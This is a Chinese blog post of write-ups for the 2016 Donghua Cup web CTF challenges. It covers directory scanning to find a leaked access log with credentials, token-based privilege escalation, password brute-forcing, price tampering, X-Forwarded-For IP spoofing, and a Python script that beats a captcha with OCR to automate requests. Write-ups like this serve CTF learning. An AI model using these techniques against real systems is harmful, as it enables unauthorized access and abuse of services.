Security CTF

东华杯Web-CTF解题思路

Posted by Xiaoxi on November 16, 2016

东华杯

Web1 仔细

用dirsearch扫一波目录,发现/log/access.log

curl下载下来

172.16.3.1 - - [12/Oct/2016:07:54:48 +0000] "GET /wojiushiHouTai888/denglU.php?username=admin&password=af3a-6b2115c9a2c0&submit=%E7%99%BB%E5%BD%95 HTTP/1.1" 200 771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"

直接访问,得flag

flag{ff11025b-ed80-4c42-afc1-29b4c41010cb}

Web2 跳

越权

在登陆test test账户时,可以看到看到一个token:test2的md5值

带着这个md5访问admin.php 就可以得到flag

Web 威胁 1

admin

爆破密码20160807

Web 威胁2

查看session发现个guest用户

试密码123456登录上去莫名得到了flag

Web 物超所值

修改返回包,把所有的钱改成0.001 保证能发出post包

post数据改为id=0.01&Price=0.01

就会弹flag

Web 抢金币

写脚本抢金币, 但是抢劫会被抓

停顿很久发现在最后一步使用result2 = s2.head(url2,data=payload, headers=header).content而非post就不会被抓.

       脚本如下:

#!/usr/bin/python

# -- coding:utf-8 --

'''

image =Image.open('vcode.png')

vcode =pytesseract.image_to_string(image)

print vcode

'''

 

import re

 

try:

    import requests

exceptImportError:

   raise SystemExit('\n[!] requests模块导入错误,请执行pipinstall requests安装!')

    

try:

    import pytesseract

    from PIL import Image

exceptImportError:

   print '模块导入错误,请使用pip安装,pytesseract依赖以下库:'

    print'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil'

    print'http://code.google.com/p/tesseract-ocr/'

    raise SystemExit

 

try:

    while 1:

        s = requests.Session()

        url1 ='http://120.132.85.112:8888/rob.php'

        url2 = 'http://120.132.85.112:8888/dorob.php'

        captchaUrl ='http://120.132.85.112:8888/code.php'

        pattern = re.compile(r'<inputtype="hidden" name="user" value=".*">')

        for userId in [4, 2, 3, 48, 1,49,58,97,98,38,36,28,114, 20, 72, 77,20,66,63,104, 31,104, 70,39]:

            #print userId

            header = {'Cookie':'PHPSESSID=fmdsad90jg0ss8aor5ef29blh7'}

            result1 = s.get(url1, params={'id':str(userId)}, headers=header).content

            matchResult =pattern.search(result1)

            if matchResult:

                captchaImage =s.get(captchaUrl, headers=header).content

                with open('captcha.png','wb')as f:

                    f.write(captchaImage)

                

                imageFile =Image.open('captcha.png')

                #print imageFile

                code =pytesseract.image_to_string(imageFile, lang="eng")

                #print code

 

                userName =matchResult.group().split('"')[5]

                payload = {'user': userName,'num': '1', 'code': code}

                s2 = requests.Session()

                result2 = s2.post(url2,data=payload, headers=header).content

                print result2

        

        '''

        r = s.post(url1, data=payload,headers=header)

        

        if 'error' not in r.content:

            print '\n爷,正确密码为:', pwd

            print '\n' + r.content

            break

        else:

           print '正在尝试密码:', pwd

        '''

exceptKeyboardInterrupt:

   raise SystemExit('大爷,按您的吩咐,已成功退出!')

Web分析

http://120.132.85.112:1999/administrator.php 能够访问管理页面 在管理页面前端源码里能找到默认账号密码 administrator administrator 登录提示IP不在许可范围 X-Forwarded-For伪造IP为127.0.0.1 得到flag

FEATURED TAGS
Web 编程 Security 算法 学习笔记 操作系统 SQL PHP 脚本语言 C++ 学习总结 计算机网络 安全工具 扯淡 Hnu 链路层 CTF DNS AWD Papers AOS Python WP
FRIENDS